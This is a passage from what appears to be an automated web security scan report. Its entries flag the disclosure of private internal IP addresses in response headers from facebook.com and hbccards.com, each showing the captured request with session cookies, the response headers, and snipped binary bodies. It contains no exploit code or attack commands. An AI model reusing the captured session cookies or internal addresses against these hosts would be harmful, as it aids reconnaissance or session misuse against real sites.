Cookie: datr=VV5oTas0hG1hzk6eclVNNMGO; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Daolnews.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.aolnews.com%252F2011%252F03%252F24%252Fcaseworkers-charged-in-death-of-marchella-brett-pierce-abused-4%252F%26extra_2%3DUS; wd=150x21

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.71.37
X-Cnection: close
Date: Sat, 26 Mar 2011 17:11:40 GMT
Content-Length: 8288

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
24.210. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FFast-Reports%2F133167183399602&layout=button_count&show_faces=false&width=450&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.fast-report.com/en/buy/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=VV5oTas0hG1hzk6eclVNNMGO; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Daolnews.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.aolnews.com%252F2011%252F03%252F24%252Fcaseworkers-charged-in-death-of-marchella-brett-pierce-abused-4%252F%26extra_2%3DUS; wd=150x21

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.50.79
X-Cnection: close
Date: Sat, 26 Mar 2011 12:22:32 GMT
Content-Length: 8264

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
24.211. http://www.hbccards.com/SkinOverPlayStopSeekMuteVol.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hbccards.com
Path:   /SkinOverPlayStopSeekMuteVol.swf

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /SkinOverPlayStopSeekMuteVol.swf HTTP/1.1
Host: www.hbccards.com
Proxy-Connection: keep-alive
Referer: http://www.hbccards.com/flash_banner/player_V4.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQASQRRDR=KMHDLKEBEFFFDGLAGGIHOIMA; X-Mapping-ofcbhgem=8D3F5C4CE3306DE23752A8D1F5AEFD98; __utmz=143952236.1301493176.1.1.utmcsr=www2.hbc.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/index.shtml; __utma=143952236.1494936254.1301493176.1301493176.1301493176.1; __utmc=143952236; __utmb=143952236.1.10.1301493176

Response

HTTP/1.1 200 OK
Date: Wed, 30 Mar 2011 13:52:18 GMT
Server: Microsoft-IIS/7.0
Content-Type: application/x-shockwave-flash
ETag: "fcbc373828f1ca1:0"
Last-Modified: Tue, 11 May 2010 16:37:17 GMT
X-Powered-By: ASP.NET
Content-Length: 6835
X-Varnish: 4073111435 4073021114
Age: 127
Via: 1.1 varnish 172.17.34.80
X-Cache: HIT

CWS    .Q..x..\yX.W.?.......Y.i.....M6..MA.(...F..
..u..3&Q..,J4C..%.F.....l...6c..M.$..h4.L...........n:....{..[u..s...=unuWs{....(........PJ...w@......LV.>.` tq,#..T...~.b.W[.s.M.U-.u....j.iue..T...
...[SNIP]...
24.212. http://www.hbccards.com/content_images/image/homepage_pic.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hbccards.com
Path:   /content_images/image/homepage_pic.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /content_images/image/homepage_pic.jpg HTTP/1.1
Host: www.hbccards.com
Proxy-Connection: keep-alive
Referer: http://www.hbccards.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQASQRRDR=KMHDLKEBEFFFDGLAGGIHOIMA; X-Mapping-ofcbhgem=8D3F5C4CE3306DE23752A8D1F5AEFD98

Response

HTTP/1.1 200 OK
Date: Wed, 30 Mar 2011 13:52:15 GMT
Server: Microsoft-IIS/7.0
Content-Type: image/jpeg
ETag: "26179efd27f1ca1:0"
Last-Modified: Tue, 11 May 2010 16:35:39 GMT
X-Powered-By: ASP.NET
Content-Length: 21498
X-Varnish: 4073109243 4073020831
Age: 126
Via: 1.1 varnish 172.17.34.80
X-Cache: HIT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

............................................................................................................f..
...[SNIP]...
24.213. http://www.hbccards.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hbccards.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
Host: www.hbccards.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQASQRRDR=KMHDLKEBEFFFDGLAGGIHOIMA; X-Mapping-ofcbhgem=8D3F5C4CE3306DE23752A8D1F5AEFD98; __utmz=143952236.1301493176.1.1.utmcsr=www2.hbc.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/index.shtml; __utma=143952236.1494936254.1301493176.1301493176.1301493176.1; __utmc=143952236; __utmb=143952236.1.10.1301493176

Response

HTTP/1.1 404 File not found
Date: Wed, 30 Mar 2011 13:52:17 GMT
Server: Varnish
X-Varnish: 4073110597
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Via: 1.1 varnish 172.17.34.80
Age: 0
Content-Length: 473


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>404 File not found</ti
...[SNIP]...
24.214. http://www.hbccards.com/flash/sifr.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hbccards.com
Path:   /flash/sifr.swf

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /flash/sifr.swf HTTP/1.1
Host: www.hbccards.com
Proxy-Connection: keep-alive
Referer: http://www.hbccards.com/ordernow.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQASQRRDR=KMHDLKEBEFFFDGLAGGIHOIMA; X-Mapping-ofcbhgem=8D3F5C4CE3306DE23752A8D1F5AEFD98; __utmz=143952236.1301493176.1.1.utmcsr=www2.hbc.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/index.shtml; sifrFetch=true; __utma=143952236.1494936254.1301493176.1301493176.1301493176.1; __utmc=143952236; __utmb=143952236.2.10.1301493176

Response

HTTP/1.1 200 OK
Date: Wed, 30 Mar 2011 13:52:25 GMT
Server: Microsoft-IIS/7.0
Content-Type: application/x-shockwave-flash
ETag: "36bdaa8726f1ca1:0"
Last-Modified: Tue, 11 May 2010 16:25:12 GMT
X-Powered-By: ASP.NET
Content-Length: 55675
X-Varnish: 4073116584 4073045881
Age: 99
Via: 1.1 varnish 172.17.34.80
X-Cache: HIT

CWS..~..x...    8...0.....e.#.ERH.Z.3eZ.H.."..a.*D*S..1.YQ..jPR    !I...(v.....~.{.....{..=g.s].....N.Z.|...ynO0._.XC.y.....3".../...."............7..w....P..=....gs`..f...{.}.....90..?.-..6........s7l..
...[SNIP]...
24.215. http://www.hbccards.com/flash_banner/player_V4.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hbccards.com
Path:   /flash_banner/player_V4.swf

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /flash_banner/player_V4.swf HTTP/1.1
Host: www.hbccards.com
Proxy-Connection: keep-alive
Referer: http://www.hbccards.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQASQRRDR=KMHDLKEBEFFFDGLAGGIHOIMA; X-Mapping-ofcbhgem=8D3F5C4CE3306DE23752A8D1F5AEFD98; __utmz=143952236.1301493176.1.1.utmcsr=www2.hbc.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/index.shtml; __utma=143952236.1494936254.1301493176.1301493176.1301493176.1; __utmc=143952236; __utmb=143952236.1.10.1301493176

Response

HTTP/1.1 200 OK
Date: Wed, 30 Mar 2011 13:52:17 GMT
Server: Microsoft-IIS/7.0
Content-Type: application/x-shockwave-flash
ETag: "80ae721da4f3ca1:0"
Last-Modified: Fri, 14 May 2010 20:29:12 GMT
X-Powered-By: ASP.NET
Content-Length: 141983
X-Varnish: 4073110451 4073020738
Age: 127
Via: 1.1 varnish 172.17.34.80
X-Cache: HIT

CWS
.|..x....XT..(.30.!..C...H...4C.9..$.9..HPD..C.....l..."AT.....-.{..>g..?..........VuuUuuu.......n...T..0.N....4.....]..L.5Q..>~ArPI..#88@NT4,,L$LR.?.]T.....b.......pP._.c.._.....X..k.s.g@........
...[SNIP]...
24.216. http://www.hbccards.com/images/background.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hbccards.com
Path:   /images/background.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/background.jpg HTTP/1.1
Host: www.hbccards.com
Proxy-Connection: keep-alive
Referer: http://www.hbccards.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQASQRRDR=KMHDLKEBEFFFDGLAGGIHOIMA; X-Mapping-ofcbhgem=8D3F5C4CE3306DE23752A8D1F5AEFD98

Response

HTTP/1.1 200 OK
Date: Wed, 30 Mar 2011 13:52:14 GMT
Server: Microsoft-IIS/7.0
Content-Type: image/jpeg
ETag: "ba7ad56a1df1ca1:0"
Last-Modified: Tue, 11 May 2010 15:19:58 GMT
X-Powered-By: ASP.NET
Content-Length: 16209
X-Varnish: 4073108197 4073020732
Age: 124
Via: 1.1 varnish 172.17.34.80
X-Cache: HIT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

..........................................................................................................F....
...[SNIP]...
24.217. http://www.hbccards.com/images/box_bg1.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hbccards.com
Path:   /images/box_bg1.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/box_bg1.jpg HTTP/1.1
Host: www.hbccards.com
Proxy-Connection: keep-alive
Referer: http://www.hbccards.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQASQRRDR=KMHDLKEBEFFFDGLAGGIHOIMA; X-Mapping-ofcbhgem=8D3F5C4CE3306DE23752A8D1F5AEFD98

Response

HTTP/1.1 200 OK
Date: Wed, 30 Mar 2011 13:52:16 GMT
Server: Microsoft-IIS/7.0
Content-Type: image/jpeg
ETag: "d636416d1df1ca1:0"
Last-Modified: Tue, 11 May 2010 15:20:02 GMT
X-Powered-By: ASP.NET
Content-Length: 4817
X-Varnish: 4073110253 4073020974
Age: 127
Via: 1.1 varnish 172.17.34.80
X-Cache: HIT

......JFIF.....d.d......Ducky.......d......Adobe.d.................................................................................................................................................f.:..
...[SNIP]...
24.218. http://www.hbccards.com/images/box_bg2.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hbccards.com
Path:   /images/box_bg2.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/box_bg2.jpg HTTP/1.1
Host: www.hbccards.com
Proxy-Connection: keep-alive
Referer: http://www.hbccards.com/ordernow.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQASQRRDR=KMHDLKEBEFFFDGLAGGIHOIMA; X-Mapping-ofcbhgem=8D3F5C4CE3306DE23752A8D1F5AEFD98; __utmz=143952236.1301493176.1.1.utmcsr=www2.hbc.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/index.shtml; sifrFetch=true; __utma=143952236.1494936254.1301493176.1301493176.1301493176.1; __utmc=143952236; __utmb=143952236.2.10.1301493176

Response

HTTP/1.1 200 OK
Date: Wed, 30 Mar 2011 13:52:21 GMT
Server: Microsoft-IIS/7.0
Content-Type: image/jpeg
ETag: "4ecaa36d1df1ca1:0"
Last-Modified: Tue, 11 May 2010 15:20:02 GMT
X-Powered-By: ASP.NET
Content-Length: 15987
X-Varnish: 4073113506 4073021040
Age: 131
Via: 1.1 varnish 172.17.34.80
X-Cache: HIT

......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS4 Macintosh.2009:07:30 14:08:39.......
...[SNIP]...
24.219. http://www.hbccards.com/images/box_bg3.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hbccards.com
Path:   /images/box_bg3.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/box_bg3.jpg HTTP/1.1
Host: www.hbccards.com
Proxy-Connection: keep-alive
Referer: http://www.hbccards.com/ordernow.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQASQRRDR=KMHDLKEBEFFFDGLAGGIHOIMA; X-Mapping-ofcbhgem=8D3F5C4CE3306DE23752A8D1F5AEFD98; __utmz=143952236.1301493176.1.1.utmcsr=www2.hbc.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/index.shtml; sifrFetch=true; __utma=143952236.1494936254.1301493176.1301493176.1301493176.1; __utmc=143952236; __utmb=143952236.2.10.1301493176

Response

HTTP/1.1 200 OK
Date: Wed, 30 Mar 2011 13:52:22 GMT
Server: Microsoft-IIS/7.0
Content-Type: image/jpeg
ETag: "ac5f16d1df1ca1:0"
Last-Modified: Tue, 11 May 2010 15:20:03 GMT
X-Powered-By: ASP.NET
Content-Length: 4808
X-Varnish: 4073114381 4073020971
Age: 132
Via: 1.1 varnish 172.17.34.80
X-Cache: HIT

......JFIF.....d.d......Ducky.......d......Adobe.d.................................................................................................................................................f.;..
...[SNIP]...
24.220. http://www.hbccards.com/images/button_bg.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hbccards.com
Path:   /images/button_bg.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/button_bg.jpg HTTP/1.1
Host: www.hbccards.com
Proxy-Connection: keep-alive
Referer: http://www.hbccards.com/ordernow.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQASQRRDR=KMHDLKEBEFFFDGLAGGIHOIMA; X-Mapping-ofcbhgem=8D3F5C4CE3306DE23752A8D1F5AEFD98; __utmz=143952236.1301493176.1.1.utmcsr=www2.hbc.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/index.shtml; sifrFetch=true; __utma=143952236.1494936254.1301493176.1301493176.1301493176.1; __utmc=143952236; __utmb=143952236.2.10.1301493176

Response

HTTP/1.1 200 OK
Date: Wed, 30 Mar 2011 13:52:21 GMT
Server: Microsoft-IIS/7.0
Content-Type: image/jpeg
ETag: "4e20cb721df1ca1:0"
Last-Modified: Tue, 11 May 2010 15:20:11 GMT
X-Powered-By: ASP.NET
Content-Length: 595
X-Varnish: 4073113479 4073021024
Age: 131
Via: 1.1 varnish 172.17.34.80
X-Cache: HIT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

............................................................................................................e..
...[SNIP]...
24.221. http://www.hbccards.com/images/footer_bg.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hbccards.com
Path:   /images/footer_bg.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/footer_bg.jpg HTTP/1.1
Host: www.hbccards.com
Proxy-Connection: keep-alive
Referer: http://www.hbccards.com/ordernow.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQASQRRDR=KMHDLKEBEFFFDGLAGGIHOIMA; X-Mapping-ofcbhgem=8D3F5C4CE3306DE23752A8D1F5AEFD98; __utmz=143952236.1301493176.1.1.utmcsr=www2.hbc.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/index.shtml; sifrFetch=true; __utma=143952236.1494936254.1301493176.1301493176.1301493176.1; __utmc=143952236; __utmb=143952236.2.10.1301493176

Response

HTTP/1.1 200 OK
Date: Wed, 30 Mar 2011 13:52:22 GMT
Server: Microsoft-IIS/7.0
Content-Type: image/jpeg
ETag: "46f22761df1ca1:0"
Last-Modified: Tue, 11 May 2010 15:20:17 GMT
X-Powered-By: ASP.NET
Content-Length: 3269
X-Varnish: 4073114434 4073020886
Age: 132
Via: 1.1 varnish 172.17.34.80
X-Cache: HIT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

...............................................................................................................
...[SNIP]...
24.222. http://www.hbccards.com/images/hbc_logo.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hbccards.com
Path:   /images/hbc_logo.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/hbc_logo.jpg HTTP/1.1
Host: www.hbccards.com
Proxy-Connection: keep-alive
Referer: http://www.hbccards.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQASQRRDR=KMHDLKEBEFFFDGLAGGIHOIMA; X-Mapping-ofcbhgem=8D3F5C4CE3306DE23752A8D1F5AEFD98

Response

HTTP/1.1 200 OK
Date: Wed, 30 Mar 2011 13:52:14 GMT
Server: Microsoft-IIS/7.0
Content-Type: image/jpeg
ETag: "4edd68811df1ca1:0"
Last-Modified: Tue, 11 May 2010 15:20:36 GMT
X-Powered-By: ASP.NET
Content-Length: 2979
X-Varnish: 4073108188 4073020717
Age: 124
Via: 1.1 varnish 172.17.34.80
X-Cache: HIT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

..........................................................................................................3.~..
...[SNIP]...
24.223. http://www.hbccards.com/images/icon_events.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hbccards.com
Path:   /images/icon_events.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/icon_events.jpg HTTP/1.1
Host: www.hbccards.com
Proxy-Connection: keep-alive
Referer: http://www.hbccards.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQASQRRDR=KMHDLKEBEFFFDGLAGGIHOIMA; X-Mapping-ofcbhgem=8D3F5C4CE3306DE23752A8D1F5AEFD98

Response

HTTP/1.1 200 OK
Date: Wed, 30 Mar 2011 13:52:16 GMT
Server: Microsoft-IIS/7.0
Content-Type: image/jpeg
ETag: "5ce243841df1ca1:0"
Last-Modified: Tue, 11 May 2010 15:20:40 GMT
X-Powered-By: ASP.NET
Content-Length: 2496
X-Varnish: 4073110196 4073020843
Age: 127
Via: 1.1 varnish 172.17.34.80
X-Cache: HIT

......JFIF.....d.d......Ducky.......d......Adobe.d.................................................................................................................................................*.'..
...[SNIP]...
24.224. http://www.hbccards.com/images/icon_live_chat.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hbccards.com
Path:   /images/icon_live_chat.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/icon_live_chat.jpg HTTP/1.1
Host: www.hbccards.com
Proxy-Connection: keep-alive
Referer: http://www.hbccards.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQASQRRDR=KMHDLKEBEFFFDGLAGGIHOIMA; X-Mapping-ofcbhgem=8D3F5C4CE3306DE23752A8D1F5AEFD98

Response

HTTP/1.1 200 OK
Date: Wed, 30 Mar 2011 13:52:16 GMT
Server: Microsoft-IIS/7.0
Content-Type: image/jpeg
ETag: "e8a8a841df1ca1:0"
Last-Modified: Tue, 11 May 2010 15:20:41 GMT
X-Powered-By: ASP.NET
Content-Length: 2361
X-Varnish: 4073110197 4073021022
Age: 126
Via: 1.1 varnish 172.17.34.80
X-Cache: HIT

......JFIF.....d.d......Ducky.......d......Adobe.d.................................................................................................................................................7.(..
...[SNIP]...
24.225. http://www.hbccards.com/images/icon_newsletter.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hbccards.com
Path:   /images/icon_newsletter.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/icon_newsletter.jpg HTTP/1.1
Host: www.hbccards.com
Proxy-Connection: keep-alive
Referer: http://www.hbccards.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQASQRRDR=KMHDLKEBEFFFDGLAGGIHOIMA; X-Mapping-ofcbhgem=8D3F5C4CE3306DE23752A8D1F5AEFD98

Response

HTTP/1.1 200 OK
Date: Wed, 30 Mar 2011 13:52:15 GMT
Server: Microsoft-IIS/7.0
Content-Type: image/jpeg
ETag: "9c58c9841df1ca1:0"
Last-Modified: Tue, 11 May 2010 15:20:41 GMT
X-Powered-By: ASP.NET
Content-Length: 2332
X-Varnish: 4073109244 4073020839
Age: 126
Via: 1.1 varnish 172.17.34.80
X-Cache: HIT

......JFIF.....d.d......Ducky.......d......Adobe.d.................................................................................................................................................-."..
...[SNIP]...
24.226. http://www.hbccards.com/images/nav_contact.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hbccards.com
Path:   /images/nav_contact.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/nav_contact.jpg HTTP/1.1
Host: www.hbccards.com
Proxy-Connection: keep-alive
Referer: http://www.hbccards.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQASQRRDR=KMHDLKEBEFFFDGLAGGIHOIMA; X-Mapping-ofcbhgem=8D3F5C4CE3306DE23752A8D1F5AEFD98

Response

HTTP/1.1 200 OK
Date: Wed, 30 Mar 2011 13:52:15 GMT
Server: Microsoft-IIS/7.0
Content-Type: image/jpeg
ETag: "94b18861df1ca1:0"
Last-Modified: Tue, 11 May 2010 15:20:43 GMT
X-Powered-By: ASP.NET
Content-Length: 1717
X-Varnish: 4073109232 4073020733
Age: 126
Via: 1.1 varnish 172.17.34.80
X-Cache: HIT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

..........................................................................................................,....
...[SNIP]...
24.227. http://www.hbccards.com/images/nav_contact_on.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hbccards.com
Path:   /images/nav_contact_on.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/nav_contact_on.jpg HTTP/1.1
Host: www.hbccards.com
Proxy-Connection: keep-alive
Referer: http://www.hbccards.com/ordernow.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQASQRRDR=KMHDLKEBEFFFDGLAGGIHOIMA; X-Mapping-ofcbhgem=8D3F5C4CE3306DE23752A8D1F5AEFD98; __utmz=143952236.1301493176.1.1.utmcsr=www2.hbc.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/index.shtml; sifrFetch=true; __utma=143952236.1494936254.1301493176.1301493176.1301493176.1; __utmc=143952236; __utmb=143952236.2.10.1301493176

Response

HTTP/1.1 200 OK
Date: Wed, 30 Mar 2011 13:52:23 GMT
Server: Microsoft-IIS/7.0
Content-Type: image/jpeg
ETag: "649982861df1ca1:0"
Last-Modified: Tue, 11 May 2010 15:20:44 GMT
X-Powered-By: ASP.NET
Content-Length: 2068
X-Varnish: 4073115584 4073021488
Age: 133
Via: 1.1 varnish 172.17.34.80
X-Cache: HIT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

..........................................................................................................,....
...[SNIP]...
24.228. http://www.hbccards.com/images/nav_gc.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hbccards.com
Path:   /images/nav_gc.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/nav_gc.jpg HTTP/1.1
Host: www.hbccards.com
Proxy-Connection: keep-alive
Referer: http://www.hbccards.com/
